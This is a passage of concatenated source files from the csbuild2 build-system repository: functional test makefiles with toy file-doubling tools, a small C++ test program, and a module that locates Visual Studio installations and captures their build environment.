managers\"\"\"\n\t\tself.runTest(\"TestProjectChained\")\n" }, { "alpha_fraction": 0.731670618057251, "alphanum_fraction": 0.7331756353378296, "avg_line_length": 30.425676345825195, "blob_id": "68e795052ec6ae2010b441e7b48355b00b29d059", "content_id": "4ffec1942efa3990f0099cae42c5e7fad89097df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4651, "license_type": "no_license", "max_line_length": 125, "num_lines": 148, "path": "/functional_tests/basic_tool_test/make.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: make\n\t:synopsis: Makefile for this test\n\n.. moduleauthor:: Jaedyn K. 
Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nfrom csbuild.toolchain import Tool\nimport os\n\nfooSet = False\nbarSet = False\nquxSet = False\n\ncsbuild.SetIntermediateDirectory(\"intermediate\")\ncsbuild.SetOutputDirectory(\"out\")\n\nclass AddDoubles(Tool):\n\t\"\"\"\n\tSimple base class to test global toolchain contexts\n\t\"\"\"\n\tsupportedArchitectures=None\n\tdef __init__(self, projectSettings):\n\t\tassert \"foo\" not in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tassert \"{}!foo\".format(id(AddDoubles)) in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tself._foo = projectSettings.get(\"foo\", False)\n\n\t\tassert \"bar\" not in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tassert \"{}!bar\".format(id(AddDoubles)) in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tself._bar = projectSettings.get(\"bar\", False)\n\n\t\tTool.__init__(self, projectSettings)\n\n\t@staticmethod\n\tdef SetFoo():\n\t\t\"\"\"\n\t\tSet foo to true, yay testing.\n\t\t\"\"\"\n\t\tglobal fooSet\n\t\tassert fooSet is False\n\t\tfooSet = True\n\t\tcsbuild.currentPlan.SetValue(\"foo\", True) #pylint: disable=protected-access\n\n\t@staticmethod\n\tdef SetBar():\n\t\t\"\"\"\n\t\tSet bar to true, yay testing.\n\t\t\"\"\"\n\t\tglobal barSet\n\t\tassert barSet is False\n\t\tbarSet = True\n\t\tcsbuild.currentPlan.SetValue(\"bar\", True) #pylint: disable=protected-access\n\nclass Doubler(AddDoubles):\n\t\"\"\"\n\tSimple tool that opens a file, doubles its contents numerically, and writes a new file.\n\t\"\"\"\n\tinputFiles = {\".first\"}\n\n\toutputFiles = {\".second\"}\n\n\tdef Run(self, inputProject, inputFile):\n\t\tassert self._foo is True\n\t\tassert self._bar is True\n\t\twith open(inputFile.filename, \"r\") as f:\n\t\t\tvalue = int(f.read())\n\t\tvalue *= 2\n\t\toutFile = os.path.join(inputProject.intermediateDir, os.path.splitext(os.path.basename(inputFile.filename))[0] + \".second\")\n\t\twith open(outFile, \"w\") as f:\n\t\t\tf.write(str(value))\n\t\t\tf.flush()\n\t\t\tos.fsync(f.fileno())\n\t\treturn outFile\n\nclass Adder(AddDoubles):\n\t\"\"\"\n\tSimple tool that opens multiple doubled files and adds their contents together numerically, outputting a final file.\n\t\"\"\"\n\tinputGroups = {\".second\"}\n\toutputFiles = {\".third\"}\n\n\tdef __init__(self, projectSettings):\n\t\tassert \"qux\" not in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tassert \"{}!qux\".format(id(Adder)) in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tself._qux = projectSettings.get(\"qux\", False)\n\n\t\tAddDoubles.__init__(self, projectSettings)\n\n\t@staticmethod\n\tdef SetQux():\n\t\t\"\"\"\n\t\tSet qux to true, yay testing.\n\t\t\"\"\"\n\t\tglobal quxSet\n\t\tassert quxSet is False\n\t\tquxSet = True\n\t\tcsbuild.currentPlan.SetValue(\"qux\", True) #pylint: disable=protected-access\n\n\tdef RunGroup(self, inputProject, inputFiles):\n\t\tassert self._foo is True\n\t\tassert self._bar is True\n\t\tassert self._qux is True\n\t\tvalue = 0\n\t\tfor inputFile in inputFiles:\n\t\t\twith open(inputFile.filename, \"r\") as f:\n\t\t\t\tvalue += int(f.read())\n\t\toutFile = os.path.join(inputProject.outputDir, inputProject.outputName + \".third\")\n\t\twith open(outFile, \"w\") as f:\n\t\t\tf.write(str(value))\n\t\t\tf.flush()\n\t\t\tos.fsync(f.fileno())\n\t\treturn outFile\n\ncsbuild.RegisterToolchain(\"AddDoubles\", \"\", 
Doubler)\ncsbuild.SetDefaultToolchain(\"AddDoubles\")\n\ncsbuild.SetFoo()\n\nwith csbuild.Project(\"TestProject\", \".\"):\n\twith csbuild.Toolchain(\"AddDoubles\"):\n\t\tcsbuild.AddTool(Adder)\n\t\tcsbuild.SetQux()\n\t\twith csbuild.Target(\"release\"):\n\t\t\tcsbuild.SetBar()\n\tcsbuild.SetOutput(\"Foo\", csbuild.ProjectType.Application)\n" }, { "alpha_fraction": 0.6222222447395325, "alphanum_fraction": 0.6222222447395325, "avg_line_length": 13.88888931274414, "blob_id": "ed6db642702835c09c06e19c198954fc5a07d64d", "content_id": "aa6b4eda5100945119300e04f961367baaa1073d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 135, "license_type": "no_license", "max_line_length": 50, "num_lines": 9, "path": "/functional_tests/explicit_sources_test/project/source/main.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "\n#include <stdio.h>\n\nextern int getnum();\nextern int getextranum();\n\nint main()\n{\n\tprintf(\"data = %d, %d\", getnum(), getextranum());\n}\n" }, { "alpha_fraction": 0.6996132731437683, "alphanum_fraction": 0.7145121693611145, "avg_line_length": 28.101476669311523, "blob_id": "87cda64bfd3e20c101ca85aa3c984b24ea43ceaf", "content_id": "747f02ac1595c5e321b350030590606f27efd588", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15773, "license_type": "no_license", "max_line_length": 154, "num_lines": 542, "path": "/csbuild/tools/common/msvc_tool_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: msvc_tool_base\n\t:synopsis: Abstract base class for msvc tools.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport json\nimport os\n\nfrom abc import ABCMeta, abstractmethod\n\nfrom csbuild import log\nfrom ..._utils.decorators import MetaClass, TypeChecked\nfrom ..._utils import PlatformString\nfrom ...toolchain import Tool\nfrom ... 
import commands\n\n\ndef _ignore(_):\n\tpass\n\ndef _noLogOnRun(shared, msg):\n\t_ignore(shared)\n\t_ignore(msg)\n\n\nclass Vcvarsall(object):\n\t\"\"\"\n\tClass for maintaining data output by vcvarsall.bat.\n\n\t:param binPath: Path to the msvc binaries.\n\t:type binPath: str\n\n\t:param libPaths: List of paths to Windows SDK libraries.\n\t:type libPaths: list\n\n\t:param winSdkVersion: Selected Windows SDK version (can be None for versions of Visual Studio that do not support selecting the SDK to be built against).\n\t:type winSdkVersion: str\n\n\t:param env: Custom environment dictionary extracted from the vcvarsall.bat output.\n\t:type env: dict\n\t\"\"\"\n\n\tInstances = dict()\n\n\tdef __init__(self, binPath, libPaths, winSdkVersion, env):\n\t\tself.binPath = binPath\n\t\tself.libPaths = libPaths\n\t\tself.winSdkVersion = winSdkVersion\n\t\tself.env = env\n\n\n\t@staticmethod\n\tdef Create(fullEnvString):\n\t\t\"\"\"\n\t\tFactory function for creating a Vcvarsall instance from a string containing all environment variables to parse.\n\n\t\t:param fullEnvString: New-line separated string of all environment variables.\n\t\t:type fullEnvString: str\n\n\t\t:return: New Vcvarsall instance.\n\t\t:rtype: :class:`csbuild.tools.common.msvc_tool_base.Vcvarsall`\n\t\t\"\"\"\n\t\tenvLines = fullEnvString.splitlines()\n\n\t\tbinPath = \"\"\n\t\tlibPaths = []\n\t\twinSdkVersion = None\n\t\tenv = dict()\n\n\t\tfor line in envLines:\n\t\t\tline = PlatformString(line)\n\n\t\t\t# Skip empty lines.\n\t\t\tif not line:\n\t\t\t\tcontinue\n\n\t\t\tkeyValue = line.split(\"=\", 1)\n\t\t\tkey = PlatformString(keyValue[0])\n\t\t\tvalue = PlatformString(keyValue[1])\n\n\t\t\tenv[key] = value\n\t\t\tkeyLowered = key.lower()\n\n\t\t\tif keyLowered == \"path\":\n\t\t\t\t# Passing a custom environment to subprocess.Popen() does not always help in locating a command\n\t\t\t\t# to execute on Windows (seems to be a bug with CreateProcess()), so we still need to find the\n\t\t\t\t# path where the tools live.\n\t\t\t\tfor envPath in [path for path in value.split(\";\") if path]:\n\t\t\t\t\tif os.access(os.path.join(envPath, \"cl.exe\"), os.F_OK):\n\t\t\t\t\t\tbinPath = PlatformString(envPath)\n\t\t\t\t\t\tbreak\n\t\t\telif keyLowered == \"lib\":\n\t\t\t\t# Extract the SDK library directory paths.\n\t\t\t\tlibPaths = [PlatformString(path) for path in value.split(\";\") if path]\n\t\t\telif keyLowered == \"windowssdkversion\":\n\t\t\t\twinSdkVersion = value.strip(\"\\\\\")\n\t\t\telif keyLowered == \"windowssdklibversion\":\n\t\t\t\t# Windows SDK 8.1 doesn't show up in a user friendly way, so we attempt to manually detect it.\n\t\t\t\tif value == \"winv6.3\\\\\":\n\t\t\t\t\twinSdkVersion = \"8.1\"\n\n\t\t# No bin path means the environment is not valid.\n\t\tif not binPath:\n\t\t\treturn None\n\n\t\treturn Vcvarsall(binPath, libPaths, winSdkVersion, env)\n\n\nclass _ArchitectureInfo(object):\n\tdef __init__(self, currentArch, projectArch, vcvarsArch, winSdkVersion, universalApp):\n\t\tself.currentArch = currentArch\n\t\tself.projectArch = projectArch\n\t\tself.vcvarsArch = vcvarsArch\n\t\tself.winSdkVersion = winSdkVersion\n\t\tself.universalApp = universalApp\n\n\nclass _BaseInstallData(object):\n\tdef __init__(self, version, displayName, path):\n\t\tself.version = version\n\t\tself.displayName = displayName\n\t\tself.path = path\n\n\n\t@staticmethod\n\t@abstractmethod\n\tdef FindInstallations(): # pylint: disable=redundant-returns-doc\n\t\t\"\"\"\n\t\tStatic function to find all available installations of Visual 
Studio.\n\n\t\t:rtype: list[:class:`csbuild.tools.common.msvc_tool_base._BaseInstallData`]\n\t\t\"\"\"\n\t\tpass\n\n\n\t@abstractmethod\n\tdef GetEnvironment(self, archInfo): # pylint: disable=redundant-returns-doc\n\t\t\"\"\"\n\t\tRetrieve the Vcvarsall instance for the current install data using the supplied architecture info.\n\n\t\t:param archInfo: Architecture info.\n\t\t:type archInfo: :class:`csbuild.tools.common.msvc_tool_base._ArchitectureInfo`\n\n\t\t:rtype: :class:`csbuild.tools.common.msvc_tool_base.Vcvarsall`\n\t\t\"\"\"\n\t\tpass\n\n\nclass _InstallDataPost2017(_BaseInstallData):\n\tdef __init__(self, version, displayName, path):\n\t\t_BaseInstallData.__init__(self, version, displayName, path)\n\n\n\t@staticmethod\n\tdef FindInstallations():\n\t\tprogFilesX86Path = os.getenv(\"ProgramFiles(x86)\")\n\t\tassert progFilesX86Path, \"Failed to find the \\\"Program Files (x86)\\\" path\"\n\n\t\tvsWhereFilePath = os.path.join(progFilesX86Path, \"Microsoft Visual Studio\", \"Installer\", \"vswhere.exe\")\n\n\t\tif not os.access(vsWhereFilePath, os.F_OK):\n\t\t\t# The file doesn't exist, so Visual Studio 2017 (or newer) hasn't been installed.\n\t\t\treturn []\n\n\t\tcmd = [\n\t\t\tvsWhereFilePath,\n\t\t\t\"-format\", \"json\",\n\t\t\t\"-requires\", \"Microsoft.VisualStudio.Component.VC.Tools.x86.x64\",\n\t\t]\n\n\t\t# Launch vswhere.exe to output information about each supported install.\n\t\t_, output, _ = commands.Run(cmd, stdout=_noLogOnRun, stderr=_noLogOnRun)\n\n\t\t# Load the install data from json.\n\t\tfoundInstallations = json.loads(output)\n\n\t\tinstallDataMap = {}\n\t\tinstallDataList = []\n\n\t\t# Parse the install information.\n\t\tfor install in foundInstallations:\n\t\t\tversion = int(install[\"installationVersion\"].split(\".\")[0])\n\t\t\tdisplayName = install[\"displayName\"]\n\t\t\tpath = install[\"installationPath\"]\n\n\t\t\tif version not in installDataMap:\n\t\t\t\tinstallDataMap.update({ version: [] })\n\n\t\t\tinstallDataMap[version].append(_InstallDataPost2017(version, displayName, path))\n\n\t\t# Sort the versions by latest to oldest.\n\t\tsortedKeys = reversed(sorted(installDataMap.keys()))\n\n\t\tfor versionKey in sortedKeys:\n\t\t\tinstallsForVersion = installDataMap[versionKey]\n\t\t\tinstallDataList.extend(installsForVersion)\n\n\t\treturn installDataList\n\n\n\tdef GetEnvironment(self, archInfo):\n\t\ttoolsRootPath = os.path.join(self.path, \"Common7\", \"Tools\")\n\t\tbatchFilePath = os.path.join(toolsRootPath, \"VsDevCmd.bat\")\n\n\t\tcmd = [\n\t\t\tbatchFilePath,\n\t\t\t\"-no_logo\",\n\t\t\t\"-arch={}\".format(archInfo.projectArch),\n\t\t\t\"-host_arch={}\".format(archInfo.currentArch),\n\t\t\t\"-winsdk={}\".format(archInfo.winSdkVersion) if archInfo.winSdkVersion else \"\",\n\t\t\t\"-app_platform={}\".format(\"UWP\" if archInfo.universalApp else \"Desktop\"),\n\t\t\t\"&\",\n\t\t\t\"set\",\n\t\t]\n\n\t\t_, output, _ = commands.Run([x for x in cmd if x], stdout=_noLogOnRun, stderr=_noLogOnRun)\n\n\t\tassert not output.startswith(\"[ERROR\"), output.replace(\"\\r\", \"\").split(\"\\n\", 1)[0]\n\n\t\treturn Vcvarsall.Create(output)\n\n\nclass _InstallDataPre2017(_BaseInstallData):\n\tdef __init__(self, version, displayName, path):\n\t\t_BaseInstallData.__init__(self, version, displayName, path)\n\n\n\t@staticmethod\n\tdef FindInstallations():\n\t\tvsVersionMacros = [\n\t\t\t(\"14\", \"VS140COMNTOOLS\", \"Visual Studio 2015\"),\n\t\t\t(\"12\", \"VS120COMNTOOLS\", \"Visual Studio 2013\"),\n\t\t\t(\"11\", \"VS110COMNTOOLS\", \"Visual Studio 
2012\"),\n\t\t\t(\"10\", \"VS100COMNTOOLS\", \"Visual Studio 2010\"),\n\t\t]\n\n\t\tinstallDataList = []\n\n\t\t# Check for each version listed.\n\t\tfor version, macro, displayName in vsVersionMacros:\n\t\t\tif macro in os.environ:\n\t\t\t\tpath = os.path.abspath(os.path.join(os.environ[macro], \"..\", \"..\"))\n\n\t\t\t\tinstallDataList.append(_InstallDataPre2017(version, displayName, path))\n\n\t\treturn installDataList\n\n\n\tdef GetEnvironment(self, archInfo):\n\t\tmsvcRootPath = os.path.join(self.path, \"VC\")\n\t\tbatchFilePath = os.path.join(msvcRootPath, \"vcvarsall.bat\")\n\t\tvcvarsArch = archInfo.vcvarsArch\n\t\tstoreArg = \"\"\n\t\twinSdkArg = \"\"\n\n\t\tif self.version == \"14\":\n\t\t\t# Only Visual Studio 2015 supports the specifying the Windows SDK version and the \"store\" argument.\n\t\t\twinSdkArg = archInfo.winSdkVersion or \"\"\n\n\t\t\tif archInfo.universalApp:\n\t\t\t\tstoreArg = \"store\"\n\n\t\telif self.version != \"12\":\n\t\t\t# Visual Studio versions prior to 2013 did not have x64-specific tools for x86 and arm.\n\t\t\tvcvarsArch = {\n\t\t\t\t\"amd64_x86\": \"x86\",\n\t\t\t\t\"amd64_arm\": \"arm\",\n\t\t\t}.get(vcvarsArch, vcvarsArch)\n\n\t\tcmd = [\n\t\t\tbatchFilePath,\n\t\t\tvcvarsArch,\n\t\t\twinSdkArg,\n\t\t\tstoreArg,\n\t\t\t\"&\",\n\t\t\t\"set\",\n\t\t]\n\n\t\t_, output, _ = commands.Run([x for x in cmd if x], stdout=_noLogOnRun, stderr=_noLogOnRun)\n\n\t\tassert not output.startswith(\"!ERROR!\"), output.replace(\"\\r\", \"\").split(\"\\n\", 1)[0]\n\n\t\treturn Vcvarsall.Create(output)\n\n\n@MetaClass(ABCMeta)\nclass MsvcToolBase(Tool):\n\t\"\"\"\n\tParent class for all msvc tools.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\n\t\tself._vsVersion = projectSettings.get(\"vsVersion\", None)\n\t\tself._winSdkVersion = projectSettings.get(\"winSdkVersion\", None)\n\t\tself._msvcSubsystem = projectSettings.get(\"msvcSubsystem\", None)\n\t\tself._msvcSubsystemVersion = projectSettings.get(\"msvcSubsystemVersion\", None)\n\n\t\tself._vcvarsall = None\n\t\tself._selectedInstall = None\n\t\tself._allInstalls = []\n\t\tself._enableUwp = False\n\n\n\t@property\n\tdef vsVersion(self):\n\t\t\"\"\"\n\t\t:return: Returns the Visual Studio version number.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn self._vsVersion\n\n\n\t@property\n\tdef winSdkVersion(self):\n\t\t\"\"\"\n\t\t:return: Returns the Windows SDK version number.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn self._winSdkVersion\n\n\t@property\n\tdef msvcSubsystem(self):\n\t\t\"\"\"\n\t\t:return: Returns the MSVC linker subsystem argument.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn self._msvcSubsystem\n\n\n\t@property\n\tdef msvcSubsystemVersion(self):\n\t\t\"\"\"\n\t\t:return: Returns the version number to use with the subsystem argument.\n\t\t:rtype: tuple[int, int]\n\t\t\"\"\"\n\t\treturn self._msvcSubsystemVersion\n\n\n\t@property\n\tdef vcvarsall(self):\n\t\t\"\"\"\n\t\t:return: Returns the Vcvarsall instance.\n\t\t:rtype: :class:`csbuild.tools.common.msvc_tool_base.Vcvarsall`\n\t\t\"\"\"\n\t\treturn self._vcvarsall\n\n\n\t@staticmethod\n\t@TypeChecked(version=str)\n\tdef SetVisualStudioVersion(version):\n\t\t\"\"\"\n\t\tSet the version of Visual Studio to use.\n\n\t\t:param version: Visual studio version\n\t\t\t\"10\" => Visual Studio 2010\n\t\t\t\"11\" => Visual Studio 2012\n\t\t\t\"12\" => Visual Studio 
2013\n\t\t\t\"14\" => Visual Studio 2015\n\t\t\t\"15\" => Visual Studio 2017\n\t\t\t\"16\" => Visual Studio 2019\n\t\t:type version: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"vsVersion\", version)\n\n\n\t@staticmethod\n\t@TypeChecked(version=str)\n\tdef SetWindowsSdkVersion(version):\n\t\t\"\"\"\n\t\tSet the Windows SDK version to build against (only applies to Visual Studio \"14.0\" and up).\n\n\t\t:param version: Windows SDK version (e.g., \"8.1\", \"10.0.15063.0\", etc)\n\t\t:type version: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"winSdkVersion\", version)\n\n\n\t@staticmethod\n\t@TypeChecked(subsystem=str)\n\tdef SetMsvcSubsystem(subsystem):\n\t\t\"\"\"\n\t\tSet the MSVC linker subsystem argument.\n\n\t\t:param subsystem: MSVC linker subsystem argument.\n\t\t:type subsystem: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"msvcSubsystem\", subsystem)\n\n\n\t@staticmethod\n\t@TypeChecked(major=int, minor=int)\n\tdef SetMsvcSubsystemVersion(major, minor):\n\t\t\"\"\"\n\t\tSet the version number to use with the subsystem argument.\n\n\t\t:param major: Subsystem major version.\n\t\t:type major: int\n\n\t\t:param minor: Subsystem minor version.\n\t\t:type minor: int\n\t\t\"\"\"\n\t\tif isinstance(major, int) and isinstance(minor, int):\n\t\t\tcsbuild.currentPlan.SetValue(\"msvcSubsystemVersion\", (major, minor))\n\n\n\tdef SetupForProject(self, project):\n\t\tTool.SetupForProject(self, project)\n\t\tcurrentArch = csbuild.GetSystemArchitecture()\n\t\tsupportedSystemArchs = {\n\t\t\t\"x86\",\n\t\t\t\"x64\",\n\t\t\t\"arm\",\n\t\t}\n\n\t\t# Msvc can only be run from a certain set of supported architectures.\n\t\tassert currentArch in supportedSystemArchs, \\\n\t\t\t'Invalid system architecture \"{}\"; msvc tools can only be run on the following architectures: {}'.format(currentArch, supportedSystemArchs)\n\n\t\t# The argument values here are directly used by vcvarsall.bat prior to Visual Studio 2017,\n\t\t# however we still use them internally for mapping the environment data for the selected\n\t\t# version of Visual Studio and determining valid build targets.\n\t\targs = {\n\t\t\t\"x64\": {\n\t\t\t\t\"x64\": \"amd64\",\n\t\t\t\t\"x86\": \"amd64_x86\",\n\t\t\t\t\"arm\": \"amd64_arm\",\n\t\t\t},\n\t\t\t\"x86\": {\n\t\t\t\t\"x64\": \"x86_amd64\",\n\t\t\t\t\"x86\": \"x86\",\n\t\t\t\t\"arm\": \"x86_arm\",\n\t\t\t},\n\t\t\t\"arm\": {\n\t\t\t\t\"x64\": None,\n\t\t\t\t\"x86\": None,\n\t\t\t\t\"arm\": \"arm\",\n\t\t\t},\n\t\t}\n\n\t\tvcvarsArch = args[currentArch][project.architectureName]\n\n\t\tassert vcvarsArch is not None, \"Building for {} on {} is unsupported.\".format(project.architectureName, currentArch)\n\n\t\t# Only run vcvarsall.bat if we haven't already for the selected architecture.\n\t\tif vcvarsArch not in Vcvarsall.Instances:\n\t\t\tarchInfo = _ArchitectureInfo(currentArch, project.architectureName, vcvarsArch, self._winSdkVersion, self._enableUwp)\n\n\t\t\tself._findInstallations()\n\t\t\tself._setupEnvironment(archInfo)\n\n\t\t# Retrieve the memoized data.\n\t\tself._vcvarsall = Vcvarsall.Instances[vcvarsArch]\n\n\n\tdef _findInstallations(self):\n\t\tif not self._allInstalls:\n\t\t\tpost2017Installs = _InstallDataPost2017.FindInstallations()\n\t\t\tpre2017Installs = _InstallDataPre2017.FindInstallations()\n\n\t\t\t# The installs should be sorted newest to oldest, so make sure the\n\t\t\t# post-2017 installs come before the pre-2017 installs.\n\t\t\tself._allInstalls = post2017Installs + pre2017Installs\n\n\n\tdef _setupEnvironment(self, 
archInfo):\n\t\tvcvarsall = None\n\n\t\tif not self._selectedInstall:\n\t\t\tinstallsToCheck = []\n\n\t\t\tfor installData in self._allInstalls:\n\t\t\t\tlog.Info(\"Found installation for {}\".format(installData.displayName))\n\n\t\t\t\tif self._vsVersion:\n\t\t\t\t\t# Only consider installs matching the version provided by the user.\n\t\t\t\t\tif str(installData.version) == self._vsVersion:\n\t\t\t\t\t\tinstallsToCheck.append(installData)\n\t\t\t\telse:\n\t\t\t\t\t# No version provided by the user, so consider all installs.\n\t\t\t\t\tinstallsToCheck.append(installData)\n\n\t\t\t# Make sure we actually have something to check.\n\t\t\tassert installsToCheck, \\\n\t\t\t\t\"No installations of Visual Studio were detected{}.\".format(\n\t\t\t\t\t\" matching version {}\".format(self._vsVersion) if self._vsVersion else \"\"\n\t\t\t\t)\n\n\t\t\t# Use the first install that provides valid environment data.\n\t\t\tfor installData in installsToCheck:\n\t\t\t\tvcvarsall = installData.GetEnvironment(archInfo)\n\n\t\t\t\tif vcvarsall:\n\t\t\t\t\tself._selectedInstall = installData\n\t\t\t\t\tlog.Build(\n\t\t\t\t\t\t\"Building for {}{}\".format(\n\t\t\t\t\t\t\tself._selectedInstall.displayName,\n\t\t\t\t\t\t\t\" using Windows SDK {}\".format(vcvarsall.winSdkVersion) if vcvarsall.winSdkVersion else \"\"\n\t\t\t\t\t\t)\n\t\t\t\t\t)\n\t\t\t\t\tbreak\n\n\t\telse:\n\t\t\t# A version of Visual Studio has already been selected, so get its environment data for the current architecture.\n\t\t\tvcvarsall = self._selectedInstall.GetEnvironment(archInfo)\n\n\t\t# Make sure the environment data is valid.\n\t\tassert vcvarsall, \\\n\t\t\t\"Failed to get environment data for {} (version {}).\".format(\n\t\t\t\tself._selectedInstall.displayName,\n\t\t\t\tself._selectedInstall.version\n\t\t\t)\n\n\t\tVcvarsall.Instances[archInfo.vcvarsArch] = vcvarsall\n" }, { "alpha_fraction": 0.731321394443512, "alphanum_fraction": 0.7320548892021179, "avg_line_length": 31.906896591186523, "blob_id": "94b3f8f1858224add737760072c3180b24d6094d", "content_id": "773822516357b55d1fdc46d3c930b1877560f3b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9543, "license_type": "no_license", "max_line_length": 125, "num_lines": 290, "path": "/functional_tests/project_generator_test/make.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. 
module:: make\n\t:synopsis: Makefile for this test\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nfrom csbuild.toolchain import Tool, SolutionGenerator\nimport os\n\nfooSet = False\nbarSet = False\nquxSet = False\nquuxset = False\n\ncsbuild.SetIntermediateDirectory(\"intermediate\")\ncsbuild.SetOutputDirectory(\"out\")\n\nclass AddDoubles(Tool):\n\t\"\"\"\n\tSimple base class to test global toolchain contexts\n\t\"\"\"\n\tsupportedArchitectures=None\n\tdef __init__(self, projectSettings):\n\t\tassert \"foo\" not in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tassert \"{}!foo\".format(id(AddDoubles)) in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tself._foo = projectSettings.get(\"foo\", False)\n\n\t\tassert \"bar\" not in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tassert \"{}!bar\".format(id(AddDoubles)) in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tself._bar = projectSettings.get(\"bar\", False)\n\n\t\tTool.__init__(self, projectSettings)\n\n\t@staticmethod\n\tdef SetFoo():\n\t\t\"\"\"\n\t\tSet foo to true, yay testing.\n\t\t\"\"\"\n\t\tglobal fooSet\n\t\tassert fooSet is False\n\t\tfooSet = True\n\t\tcsbuild.currentPlan.SetValue(\"foo\", True)\n\n\t@staticmethod\n\tdef SetBar():\n\t\t\"\"\"\n\t\tSet bar to true, yay testing.\n\t\t\"\"\"\n\t\tglobal barSet\n\t\tassert barSet is False\n\t\tbarSet = True\n\t\tcsbuild.currentPlan.SetValue(\"bar\", True)\n\nclass Doubler(AddDoubles):\n\t\"\"\"\n\tSimple tool that opens a file, doubles its contents numerically, and writes a new file.\n\t\"\"\"\n\tinputFiles = {\".first\"}\n\n\toutputFiles = {\".second\"}\n\n\tdef Run(self, inputProject, inputFile):\n\t\tassert self._foo is True\n\t\tassert self._bar is True\n\t\twith open(inputFile.filename, \"r\") as f:\n\t\t\tvalue = int(f.read())\n\t\tvalue *= 2\n\t\toutFile = os.path.join(inputProject.intermediateDir, 